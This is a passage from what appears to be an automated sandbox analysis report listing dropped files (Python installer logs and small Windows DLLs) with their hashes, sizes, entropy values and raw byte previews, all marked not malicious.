                                                                                                                                Preview:s...................................................................................................................................................................................................................................................................................................................................................................................................................................W.i.x.B.u.n.d.l.e.F.o.r.c.e.d.R.e.s.t.a.r.t.P.a.c.k.a.g.e.....................W.i.x.B.u.n.d.l.e.L.a.s.t.U.s.e.d.S.o.u.r.c.e.....................W.i.x.B.u.n.d.l.e.N.a.m.e.........P.y.t.h.o.n. .3...1.1...0. .(.6.4.-.b.i.t.).............W.i.x.B.u.n.d.l.e.O.r.i.g.i.n.a.l.S.o.u.r.c.e.....4...C.:.\.U.s.e.r.s.\.F.R.O.N.T.D.~.1.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.t.m.p.a.f.9.9.a.a.q.q...e.x.e.............W.i.x.B.u.n.d.l.e.O.r.i.g.i.n.a.l.S.o.u.r.c.e.F.o.l.d.e.r.....%...C.:.\.U.s.e.r.s.\.F.R.O.N.T.D.~.1.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.............................
                                                                                                                                Process:C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exe
                                                                                                                                File Type:ASCII text, with very long lines (431), with CRLF line terminators
                                                                                                                                Category:modified
                                                                                                                                Size (bytes):75485
                                                                                                                                Entropy (8bit):5.369091551339989
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:1Y884Iz7dOpYkW5vIr3ruX1KJKGKY+Vbvr9cSND1acwZU9MnMkMaEDN52ob4OJ5P:1GkW5vIrBYlFnp73iVrGLbaavUC
                                                                                                                                MD5:EE5CC97E52010214A036637D5AAEAF88
                                                                                                                                SHA1:1A2331B672E9EA38FD3378D263247AD98B3828F6
                                                                                                                                SHA-256:D63177C5FC4332079132B94B786F9FA1288810BED18FC47765178589F7B02F48
                                                                                                                                SHA-512:5DDA9FBBB3080571524D229139D77F12715B7F6345EAFBC89F5F28462360EA89F0E9CE6F9492DBC9C0A1B8A0D4CCBFF14D8A1C4A9043549D4620B8CEA15B407D
                                                                                                                                Malicious:false
                                                                                                                                Preview:[0B5C:0C0C][2024-10-14T03:09:41]i001: Burn v3.14.0.5722, Windows v10.0 (Build 19045: Service Pack 0), path: C:\Windows\Temp\{8525A9B8-FAAD-4C71-B074-F663031D8BEE}\.cr\tmpaf99aaqq.exe..[0B5C:0C0C][2024-10-14T03:09:41]i000: Initializing string variable 'ActionLikeInstalling' to value 'Installing'..[0B5C:0C0C][2024-10-14T03:09:41]i000: Initializing string variable 'ActionLikeInstallation' to value 'Setup'..[0B5C:0C0C][2024-10-14T03:09:41]i000: Initializing string variable 'ShortVersion' to value '3.11'..[0B5C:0C0C][2024-10-14T03:09:41]i000: Initializing numeric variable 'ShortVersionNoDot' to value '311'..[0B5C:0C0C][2024-10-14T03:09:41]i000: Initializing string variable 'WinVer' to value '3.11'..[0B5C:0C0C][2024-10-14T03:09:41]i000: Initializing numeric variable 'WinVerNoDot' to value '311'..[0B5C:0C0C][2024-10-14T03:09:41]i000: Initializing numeric variable 'InstallAllUsers' to value '0'..[0B5C:0C0C][2024-10-14T03:09:41]i000: Initializing numeric variable 'InstallLauncherAllUsers' to va
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with very long lines (339), with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):453852
                                                                                                                                Entropy (8bit):3.8264661748642466
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6144:+jDXjmf1iRTaGq4vCXNQ9pTq/nuWz+qzqK05R84nq+5GJKdAR03f85ky/Gnuu4uP:cR
                                                                                                                                MD5:19646FE826820D555F107C93653C821D
                                                                                                                                SHA1:B65BBCC6B91778C746B8A31324C50BBBD3137AF8
                                                                                                                                SHA-256:8C0AEA6726B2CBA1FD7DDFFA6985E046C42CCD8FCE789AB193A5EE1B565C0738
                                                                                                                                SHA-512:629434B58F86144DC4939EBC7BB0083E7EEA1D370BAA46F4EBCB64D8F3BAA502BFC8F2E4679DEDA518CBD487E77E48367C56159F3BA4904E19A62AEA2B68D5B7
                                                                                                                                Malicious:false
                                                                                                                                Preview:..=.=.=. .V.e.r.b.o.s.e. .l.o.g.g.i.n.g. .s.t.a.r.t.e.d.:. .1.4./.1.0./.2.0.2.4. . .0.3.:.1.0.:.0.3. . .B.u.i.l.d. .t.y.p.e.:. .S.H.I.P. .U.N.I.C.O.D.E. .5...0.0...1.0.0.1.1...0.0. . .C.a.l.l.i.n.g. .p.r.o.c.e.s.s.:. .C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.{.3.2.A.E.4.4.B.6.-.4.8.4.3.-.4.2.E.0.-.A.C.9.F.-.2.2.3.B.D.A.7.2.F.3.5.2.}.\...b.e.\.p.y.t.h.o.n.-.3...1.1...0.-.a.m.d.6.4...e.x.e. .=.=.=.....M.S.I. .(.c.). .(.6.8.:.9.C.). .[.0.3.:.1.0.:.0.3.:.6.6.6.].:. .R.e.s.e.t.t.i.n.g. .c.a.c.h.e.d. .p.o.l.i.c.y. .v.a.l.u.e.s.....M.S.I. .(.c.). .(.6.8.:.9.C.). .[.0.3.:.1.0.:.0.3.:.6.6.6.].:. .M.a.c.h.i.n.e. .p.o.l.i.c.y. .v.a.l.u.e. .'.D.e.b.u.g.'. .i.s. .0.....M.S.I. .(.c.). .(.6.8.:.9.C.). .[.0.3.:.1.0.:.0.3.:.6.6.6.].:. .*.*.*.*.*.*.*. .R.u.n.E.n.g.i.n.e.:..... . . . . . . . . . . .*.*.*.*.*.*.*. .P.r.o.d.u.c.t.:. .C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.P.a.c.k.a.g.e. .C.a.c.h.e.\.{.7.4.A.2.D.2.B.F.-.B.D.4.F.-.4.D.8.2.-.8.1.2.F.-.E.D.E.B.2.1.E.A.4.4.3.F.}.v.3...1.1...1.5.0...0.\.d.e.v...m.s.i..... . . . .
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with very long lines (339), with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1870622
                                                                                                                                Entropy (8bit):3.8245643750014224
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3072:s9HSis9jmhr5WRGDMNIPKLktfKxu3ZMmX+s+oEZA9Cz/ZFebMDneZpou+hCxwpFE:epmjNvBo1E52JZ
                                                                                                                                MD5:B08EF28F2FD0526A4F46285FF6E40E0C
                                                                                                                                SHA1:EFA459E9F31FD73FD5F82C70ADFAE1570F55CCA3
                                                                                                                                SHA-256:4E8A0412808803D904266460670753BD586BB81C0E1F000A0E48BFB8A82EB081
                                                                                                                                SHA-512:3C37EF21BBFDA4F5BEB76B52E80F5FB01F7980244765D6BF702F742FEE7A157A2D0791FB00B835BB39C310F4637E34EE4872137C1010CCB90F9F5F1D6828A93B
                                                                                                                                Malicious:false
                                                                                                                                Preview:..=.=.=. .V.e.r.b.o.s.e. .l.o.g.g.i.n.g. .s.t.a.r.t.e.d.:. .1.4./.1.0./.2.0.2.4. . .0.3.:.1.0.:.0.8. . .B.u.i.l.d. .t.y.p.e.:. .S.H.I.P. .U.N.I.C.O.D.E. .5...0.0...1.0.0.1.1...0.0. . .C.a.l.l.i.n.g. .p.r.o.c.e.s.s.:. .C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.{.3.2.A.E.4.4.B.6.-.4.8.4.3.-.4.2.E.0.-.A.C.9.F.-.2.2.3.B.D.A.7.2.F.3.5.2.}.\...b.e.\.p.y.t.h.o.n.-.3...1.1...0.-.a.m.d.6.4...e.x.e. .=.=.=.....M.S.I. .(.c.). .(.6.8.:.D.C.). .[.0.3.:.1.0.:.0.8.:.4.4.7.].:. .R.e.s.e.t.t.i.n.g. .c.a.c.h.e.d. .p.o.l.i.c.y. .v.a.l.u.e.s.....M.S.I. .(.c.). .(.6.8.:.D.C.). .[.0.3.:.1.0.:.0.8.:.4.4.7.].:. .M.a.c.h.i.n.e. .p.o.l.i.c.y. .v.a.l.u.e. .'.D.e.b.u.g.'. .i.s. .0.....M.S.I. .(.c.). .(.6.8.:.D.C.). .[.0.3.:.1.0.:.0.8.:.4.4.7.].:. .*.*.*.*.*.*.*. .R.u.n.E.n.g.i.n.e.:..... . . . . . . . . . . .*.*.*.*.*.*.*. .P.r.o.d.u.c.t.:. .C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.P.a.c.k.a.g.e. .C.a.c.h.e.\.{.C.B.7.E.1.8.0.1.-.9.F.B.8.-.4.7.6.3.-.A.3.6.9.-.1.D.7.F.2.9.0.A.B.2.4.D.}.v.3...1.1...1.5.0...0.\.l.i.b...m.s.i..... . . . .
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with very long lines (339), with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):277800
                                                                                                                                Entropy (8bit):3.831227951999701
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3072:z4jTDlGrA6mLq4HqhbuQeMg9fpIpW82S0AUoWm1lb3q/9hSG9Wlkab+dVZ1bJ/BB:sjfZ
                                                                                                                                MD5:5AE7D00DBD36CC3728C2D38749422CD5
                                                                                                                                SHA1:89AF49FD384D1FFA7601DF0E3F1C80B5E12D1E32
                                                                                                                                SHA-256:D1D964062F372504494285E79C241288F037E1359ADD0BC89DFA9809B4B5D576
                                                                                                                                SHA-512:F2D0E620392ABAB12F1DDE501D21B4F837E88C9B566B47AAAFE4563666A6FD7AE34047DDF25E87BB1AAA366F64E444A8C1940BDBD94309A72A203017EEF9ED61
                                                                                                                                Malicious:false
                                                                                                                                Preview:..=.=.=. .V.e.r.b.o.s.e. .l.o.g.g.i.n.g. .s.t.a.r.t.e.d.:. .1.4./.1.0./.2.0.2.4. . .0.3.:.1.0.:.5.6. . .B.u.i.l.d. .t.y.p.e.:. .S.H.I.P. .U.N.I.C.O.D.E. .5...0.0...1.0.0.1.1...0.0. . .C.a.l.l.i.n.g. .p.r.o.c.e.s.s.:. .C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.{.3.2.A.E.4.4.B.6.-.4.8.4.3.-.4.2.E.0.-.A.C.9.F.-.2.2.3.B.D.A.7.2.F.3.5.2.}.\...b.e.\.p.y.t.h.o.n.-.3...1.1...0.-.a.m.d.6.4...e.x.e. .=.=.=.....M.S.I. .(.c.). .(.6.8.:.3.C.). .[.0.3.:.1.0.:.5.6.:.3.0.6.].:. .R.e.s.e.t.t.i.n.g. .c.a.c.h.e.d. .p.o.l.i.c.y. .v.a.l.u.e.s.....M.S.I. .(.c.). .(.6.8.:.3.C.). .[.0.3.:.1.0.:.5.6.:.3.0.6.].:. .M.a.c.h.i.n.e. .p.o.l.i.c.y. .v.a.l.u.e. .'.D.e.b.u.g.'. .i.s. .0.....M.S.I. .(.c.). .(.6.8.:.3.C.). .[.0.3.:.1.0.:.5.6.:.3.0.6.].:. .*.*.*.*.*.*.*. .R.u.n.E.n.g.i.n.e.:..... . . . . . . . . . . .*.*.*.*.*.*.*. .P.r.o.d.u.c.t.:. .C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.P.a.c.k.a.g.e. .C.a.c.h.e.\.{.B.D.2.9.D.0.2.3.-.6.B.9.5.-.4.7.F.E.-.B.4.8.0.-.5.9.8.8.4.0.E.B.9.A.2.8.}.v.3...1.1...1.5.0...0.\.t.o.o.l.s...m.s.i..... . .
                                                                                                                                Process:C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.be\python-3.11.0-amd64.exe
                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with very long lines (366), with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):109856
                                                                                                                                Entropy (8bit):3.793821236834951
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:QhsT5vdeH0ihPn/hQrQxSttRRdZtsilLD7NudNYpJEvVjY7JAW52I04LU:QtjY7JAW55h4
                                                                                                                                MD5:5F74416942FAA52943DDC4CC51B8DDEB
                                                                                                                                SHA1:59CDA9813BCDC0E1D13ACCBC99009ABFDC00745E
                                                                                                                                SHA-256:6C7B9588D590AB5DDCC039D790F1E4A4E37B423E1CDA9FB6D0853FE02E19888D
                                                                                                                                SHA-512:992305D67388D99E858CE2B3452CD5C51678E7D6DA281D1EF0A0F626A3EB954EB7846523FB4E77245744BA470F9E05BF6C4C985E3510395E8F8C29AFB049C877
                                                                                                                                Malicious:false
                                                                                                                                Preview:..=.=.=. .V.e.r.b.o.s.e. .l.o.g.g.i.n.g. .s.t.a.r.t.e.d.:. .1.4./.1.0./.2.0.2.4. . .0.3.:.1.1.:.3.7. . .B.u.i.l.d. .t.y.p.e.:. .S.H.I.P. .U.N.I.C.O.D.E. .5...0.0...1.0.0.1.1...0.0. . .C.a.l.l.i.n.g. .p.r.o.c.e.s.s.:. .C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.{.3.2.A.E.4.4.B.6.-.4.8.4.3.-.4.2.E.0.-.A.C.9.F.-.2.2.3.B.D.A.7.2.F.3.5.2.}.\...b.e.\.p.y.t.h.o.n.-.3...1.1...0.-.a.m.d.6.4...e.x.e. .=.=.=.....M.S.I. .(.c.). .(.6.8.:.6.4.). .[.0.3.:.1.1.:.3.7.:.0.0.9.].:. .R.e.s.e.t.t.i.n.g. .c.a.c.h.e.d. .p.o.l.i.c.y. .v.a.l.u.e.s.....M.S.I. .(.c.). .(.6.8.:.6.4.). .[.0.3.:.1.1.:.3.7.:.0.0.9.].:. .M.a.c.h.i.n.e. .p.o.l.i.c.y. .v.a.l.u.e. .'.D.e.b.u.g.'. .i.s. .0.....M.S.I. .(.c.). .(.6.8.:.6.4.). .[.0.3.:.1.1.:.3.7.:.0.0.9.].:. .*.*.*.*.*.*.*. .R.u.n.E.n.g.i.n.e.:..... . . . . . . . . . . .*.*.*.*.*.*.*. .P.r.o.d.u.c.t.:. .C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.P.a.c.k.a.g.e. .C.a.c.h.e.\.{.0.E.6.E.E.A.C.9.-.4.9.1.3.-.4.C.2.F.-.B.7.D.2.-.7.6.1.B.2.7.C.3.5.D.7.C.}.v.3...1.1...7.9.6.6...0.\.l.a.u.n.c.h.e.r...m.s.i.
                                                                                                                                Process:C:\Users\user\Desktop\3Af7PybsUi.exe
                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):11264
                                                                                                                                Entropy (8bit):4.703513333396807
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:nDzb9VD9daQ2iTrqT+6Zdp/Q0I1uLfcC75JiC4Rs89EcYyGDV90OcX6gY/7ECFV:Dzz9damqTrpYTst0E5DVPcqgY/79X
                                                                                                                                MD5:6176101B7C377A32C01AE3EDB7FD4DE6
                                                                                                                                SHA1:5F1CB443F9D677F313BEC07C5241AEAB57502F5E
                                                                                                                                SHA-256:EFEA361311923189ECBE3240111EFBA329752D30457E0DBE9628A82905CD4BDB
                                                                                                                                SHA-512:3E7373B71AE0834E96A99595CFEF2E96C0F5230429ADC0B5512F4089D1ED0D7F7F0E32A40584DFB13C41D257712A9C4E9722366F0A21B907798AE79D8CEDCF30
                                                                                                                                Malicious:false
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K...*b..*b..*b..R...*b..Uc..*b.Rc..*b..*c..*b..Ug..*b..Uf..*b..Ua..*b..j..*b..b..*b....*b..`..*b.Rich.*b.................PE..d....e.........." ...%............P........................................p............`.........................................P(.......(..d....P.......@...............`..,...."...............................!..@............ ...............................text............................... ..`.rdata..,.... ......................@..@.data...8....0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......(..............@..@.reloc..,....`.......*..............@..B................................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Users\user\Desktop\3Af7PybsUi.exe
                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):13312
                                                                                                                                Entropy (8bit):4.968452734961967
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:JF3TgNlF/1Nt5aSd4+1ijg0NLfFNJSCqsstXHTeH5ht47qMbxbfDqbwYH/kcX6gT:WF/1nb2mhQtkXHTeZ87VDqrMcqgYvEp
                                                                                                                                MD5:371776A7E26BAEB3F75C93A8364C9AE0
                                                                                                                                SHA1:BF60B2177171BA1C6B4351E6178529D4B082BDA9
                                                                                                                                SHA-256:15257E96D1CA8480B8CB98F4C79B6E365FE38A1BA9638FC8C9AB7FFEA79C4762
                                                                                                                                SHA-512:C23548FBCD1713C4D8348917FF2AB623C404FB0E9566AB93D147C62E06F51E63BDAA347F2D203FE4F046CE49943B38E3E9FA1433F6455C97379F2BC641AE7CE9
                                                                                                                                Malicious:false
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%............P.....................................................`..........................................8......x9..d....`.......P..L............p..,....3...............................1..@............0...............................text...(........................... ..`.rdata.......0......................@..@.data...8....@.......*..............@....pdata..L....P.......,..............@..@.rsrc........`.......0..............@..@.reloc..,....p.......2..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Users\user\Desktop\3Af7PybsUi.exe
                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):13824
                                                                                                                                Entropy (8bit):5.061461040216793
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:ldF/1nb2mhQtkXn0t/WS60YYDEiqvdvGyv9lkVcqgYvEMo:v2f6XSZ6XYD6vdvGyv9MgYvEMo
                                                                                                                                MD5:CB5238E2D4149636377F9A1E2AF6DC57
                                                                                                                                SHA1:038253BABC9E652BA4A20116886209E2BCCF35AC
                                                                                                                                SHA-256:A8D3BB9CD6A78EBDB4F18693E68B659080D08CB537F9630D279EC9F26772EFC7
                                                                                                                                SHA-512:B1E6AB509CF1E5ECC6A60455D6900A76514F8DF43F3ABC3B8D36AF59A3DF8A868B489ED0B145D0D799AAC8672CBF5827C503F383D3F38069ABF6056ECCD87B21
                                                                                                                                Malicious:false
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%............P.....................................................`..........................................8.......9..d....`.......P..d............p..,....2...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...8....@.......,..............@....pdata..d....P......................@..@.rsrc........`.......2..............@..@.reloc..,....p.......4..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Users\user\Desktop\3Af7PybsUi.exe
                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):13824
                                                                                                                                Entropy (8bit):5.236167046748013
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:/siHXqpoUol3xZhRyQX5lDnRDFYav+tcqgRvE:h6D+XBDgDgRvE
                                                                                                                                MD5:D9E7218460AEE693BEA07DA7C2B40177
                                                                                                                                SHA1:9264D749748D8C98D35B27BEFE6247DA23FF103D
                                                                                                                                SHA-256:38E423D3BCC32EE6730941B19B7D5D8872C0D30D3DD8F9AAE1442CB052C599AD
                                                                                                                                SHA-512:DDB579E2DEA9D266254C0D9E23038274D9AE33F0756419FD53EC6DC1A27D1540828EE8F4AD421A5CFFD9B805F1A68F26E70BDC1BAB69834E8ACD6D7BB7BDB0DB
                                                                                                                                Malicious:false
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K..*...*...*...R...*...U...*..R...*...*...*...U...*...U...*...U...*.....*.....*...}..*.....*..Rich.*..........................PE..d....e.........." ...%............P.....................................................`..........................................9.......9..d....`.......P..|............p..,....3...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...h....@.......,..............@....pdata..|....P......................@..@.rsrc........`.......2..............@..@.reloc..,....p.......4..............@..B........................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Users\user\Desktop\3Af7PybsUi.exe
                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):36352
                                                                                                                                Entropy (8bit):6.558176937399355
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:Dz2P+7nYpPMedFDlDchrVX1mEVmT9ZgkoD/PKDkGuF0U390QOo8VdbKBWmuCLg46:DzeqWB7YJlmLJ3oD/S4j990th9VCsC
                                                                                                                                MD5:F751792DF10CDEED391D361E82DAF596
                                                                                                                                SHA1:3440738AF3C88A4255506B55A673398838B4CEAC
                                                                                                                                SHA-256:9524D1DADCD2F2B0190C1B8EDE8E5199706F3D6C19D3FB005809ED4FEBF3E8B5
                                                                                                                                SHA-512:6159F245418AB7AD897B02F1AADF1079608E533B9C75006EFAF24717917EAA159846EE5DFC0E85C6CFF8810319EFECBA80C1D51D1F115F00EC1AFF253E312C00
                                                                                                                                Malicious:false
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K...*b..*b..*b..R...*b..Uc..*b.Rc..*b..*c..*b..Ug..*b..Uf..*b..Ua..*b..j..*b..b..*b....*b..`..*b.Rich.*b.................PE..d....e.........." ...%.H...H......P.....................................................`.................................................,...d...............................4... ...................................@............`...............................text....F.......H.................. ..`.rdata..d6...`...8...L..............@..@.data...8...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..4...........................@..B................................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Users\user\Desktop\3Af7PybsUi.exe
                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):15872
                                                                                                                                Entropy (8bit):5.285191078037458
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:wJBjJHEkEPYi3Xd+dc26E4++yuqAyXW9wifD4jqccqgwYUMvEW:ikRwi3wO26Ef+yuIm9PfD7wgwYUMvE
                                                                                                                                MD5:BBEA5FFAE18BF0B5679D5C5BCD762D5A
                                                                                                                                SHA1:D7C2721795113370377A1C60E5CEF393473F0CC5
                                                                                                                                SHA-256:1F4288A098DA3AAC2ADD54E83C8C9F2041EC895263F20576417A92E1E5B421C1
                                                                                                                                SHA-512:0932EC5E69696D6DD559C30C19FC5A481BEFA38539013B9541D84499F2B6834A2FFE64A1008A1724E456FF15DDA6268B7B0AD8BA14918E2333567277B3716CC4
                                                                                                                                Malicious:false
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........TX..:...:...:.....:..;...:...;...:...;...:..?...:..>...:..9...:..R2...:..R:...:..R....:..R8...:.Rich..:.................PE..d....e.........." ...%. ... ......P.....................................................`..........................................9......D:..d....`.......P...............p..,....3...............................1..@............0.. ............................text...h........ .................. ..`.rdata.......0.......$..............@..@.data...(....@.......4..............@....pdata.......P.......6..............@..@.rsrc........`.......:..............@..@.reloc..,....p.......<..............@..B................................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Users\user\Desktop\3Af7PybsUi.exe
                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):16384
                                                                                                                                Entropy (8bit):5.505471888568532
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:vd9VkyQ5f8vjVaCHpKpTTjaNe7oca2DW3Q2dhmdcqgwNeecBih:JkP5cjIGpKlqD2D4kzgwNeE
                                                                                                                                MD5:D2175300E065347D13211F5BF7581602
                                                                                                                                SHA1:3AE92C0B0ECDA1F6B240096A4E68D16D3DB1FFB0
                                                                                                                                SHA-256:94556934E3F9EE73C77552D2F3FC369C02D62A4C9E7143E472F8E3EE8C00AEE1
                                                                                                                                SHA-512:6156D744800206A431DEE418A1C561FFB45D726DC75467A91D26EE98503B280C6595CDEA02BDA6A023235BD010835EA1FC9CB843E9FEC3501980B47B6B490AF7
                                                                                                                                Malicious:false
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%."... ......P.....................................................`.........................................0J.......J..d....p.......`..................,....C...............................B..@............@...............................text....!.......".................. ..`.rdata.......@.......&..............@..@.data...8....P.......6..............@....pdata.......`.......8..............@..@.rsrc........p.......<..............@..@.reloc..,............>..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Users\user\Desktop\3Af7PybsUi.exe
                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):20992
                                                                                                                                Entropy (8bit):6.06124024160806
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:bUv5cJMOZA0nmwBD+XpJgLa0Mp8Qpg4P2llyM:0K1XBD+DgLa1yTi
                                                                                                                                MD5:45616B10ABE82D5BB18B9C3AB446E113
                                                                                                                                SHA1:91B2C0B0F690AE3ABFD9B0B92A9EA6167049B818
                                                                                                                                SHA-256:F348DB1843B8F38A23AEE09DD52FB50D3771361C0D529C9C9E142A251CC1D1EC
                                                                                                                                SHA-512:ACEA8C1A3A1FA19034FD913C8BE93D5E273B7719D76CB71C36F510042918EA1D9B44AC84D849570F9508D635B4829D3E10C36A461EC63825BA178F5AC1DE85FB
                                                                                                                                Malicious:false
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%.$...0......P.....................................................`.........................................pY.......Z..d............p..................4...@S...............................R..@............@...............................text....".......$.................. ..`.rdata..L....@... ...(..............@..@.data...8....`.......H..............@....pdata.......p.......J..............@..@.rsrc................N..............@..@.reloc..4............P..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Users\user\Desktop\3Af7PybsUi.exe
                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):25088
                                                                                                                                Entropy (8bit):6.475467273446457
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:oc6HLZiMDFuGu+XHZXmrfXA+UA10ol31tuXy4IYgLWi:B6H1TZXX5XmrXA+NNxWiFdLWi
                                                                                                                                MD5:CF3C2F35C37AA066FA06113839C8A857
                                                                                                                                SHA1:39F3B0AEFB771D871A93681B780DA3BD85A6EDD0
                                                                                                                                SHA-256:1261783F8881642C3466B96FA5879A492EA9E0DAB41284ED9E4A82E8BCF00C80
                                                                                                                                SHA-512:1C36B80AAE49FD5E826E95D83297AE153FDB2BC652A47D853DF31449E99D5C29F42ED82671E2996AF60DCFB862EC5536BB0A68635D4E33D33F8901711C0C8BE6
                                                                                                                                Malicious:false
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%.$...@............................................................`.........................................@i.......i..d...............................4....b...............................a..@............@...............................text....#.......$.................. ..`.rdata.......@...0...(..............@..@.data...8....p.......X..............@....pdata...............Z..............@..@.rsrc................^..............@..@.reloc..4............`..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Users\user\Desktop\3Af7PybsUi.exe
                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):12288
                                                                                                                                Entropy (8bit):4.838534302892255
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:0F/1nb2mhQtkr+juOxKbDbnHcqgYvEkrK:u2f6iuOsbDtgYvEmK
                                                                                                                                MD5:20708935FDD89B3EDDEEA27D4D0EA52A
                                                                                                                                SHA1:85A9FE2C7C5D97FD02B47327E431D88A1DC865F7
                                                                                                                                SHA-256:11DD1B49F70DB23617E84E08E709D4A9C86759D911A24EBDDFB91C414CC7F375
                                                                                                                                SHA-512:F28C31B425DC38B5E9AD87B95E8071997E4A6F444608E57867016178CD0CA3E9F73A4B7F2A0A704E45F75B7DCFF54490510C6BF8461F3261F676E9294506D09B
                                                                                                                                Malicious:false
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%............P.....................................................`..........................................8.......9..d....`.......P..X............p..,....2...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...8....@.......&..............@....pdata..X....P.......(..............@..@.rsrc........`.......,..............@..@.reloc..,....p......................@..B........................................................................................................................................................................................................................................................
                                                                                                                                Process:C:\Users\user\Desktop\3Af7PybsUi.exe
                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                Category:dropped
